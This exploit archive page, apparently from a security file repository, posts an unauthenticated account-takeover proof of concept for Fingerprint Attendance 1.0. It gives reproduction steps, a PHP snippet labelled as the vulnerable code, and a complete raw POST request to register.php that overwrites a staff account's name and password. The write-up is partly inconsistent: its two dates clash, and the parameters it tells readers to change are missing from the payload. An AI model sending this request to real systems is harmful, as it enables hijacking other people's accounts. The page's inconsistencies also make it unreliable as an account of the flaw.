Fingerprint Attendance 1.0 Account Takeover

Fingerprint Attendance 1.0 Account Takeover: Posted Mar 29, 2022; Authored by Hejap Zairy; Fingerprint Attendance version 1.0 allows for an arbitrary password reset of any user.; tags | exploit, arbitrary, bypass; SHA-256 | 349d72455afa61c19576dd3b35d2b351fb9e9242b3dc49747aede103705ebd0b; Download | Favorite | View

Fingerprint Attendance 1.0 Account Takeover

# Title: Fingerprint Attendance 1.0  Account Takeover 
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

Fingerprint Attendance  is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters

#Steps to Reproduce

1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.

2. Go to  /fingerprint/src/ and Log in to the user account by changed username and password


#vulnerability Code  php

```
<?php
    echo "document.getElementById('fname').value = '".$qry["first_name"]."';";
    echo "document.getElementById('lname').value = '".$qry["last_name"]."';";

    echo "document.getElementById('NRIC').value = '".$qry["NRIC"]."';";
    echo "document.getElementById('email').value = '".$qry["email"]."';";
    echo "document.getElementById('contact').value = '".$qry["mobile"]."';";
    echo "document.getElementById('contact2').value = '".$qry["mobile2"]."';";

    echo "document.getElementById('line1').value = '".$qry["password"]."';";
    echo "document.getElementById('line2').value = '".$qry["line1"]."';";
    echo "document.getElementById('line3').value = '".$qry["line2"]."';";
    echo "document.getElementById('city').value = '".$qry["city"]."';";
    echo "document.getElementById('zip').value = '".$qry["zip"]."';";
    echo "document.getElementById('country').value = '".$qry["country"]."';";

    echo "document.getElementById('bankName').value = '".$qry["bankName"]."';";
    echo "document.getElementById('bankDetail').value = '".$qry["bankDetail"]."';";

    echo "document.getElementById('job').value = '".$qry["jobTitle"]."';";
  ?>
```


# Description:
Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information


[+] Payload POST

```
POST /fingerprint/src/register.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116
Content-Length: 2446
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/register.php
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q
Upgrade-Insecure-Requests: 1

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fname"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="lname"

admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="NRIC"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="emailaddress"
Admin@gmail.com
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact"

admin

-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="contact2"
admin
-----------------------------3324626841792192532944123116

Content-Disposition: form-data; name="password"
admin12345
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line2"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line3"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="city"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="zip"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="country"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankName"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankDetail"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="job"
Admin

-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="button"
Register
-----------------------------3324626841792192532944123116--
```

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Fingerprint Attendance 1.0 Account Takeover

Fingerprint Attendance 1.0 Account Takeover

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Fingerprint Attendance 1.0 Account Takeover

Share This

Fingerprint Attendance 1.0 Account Takeover

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems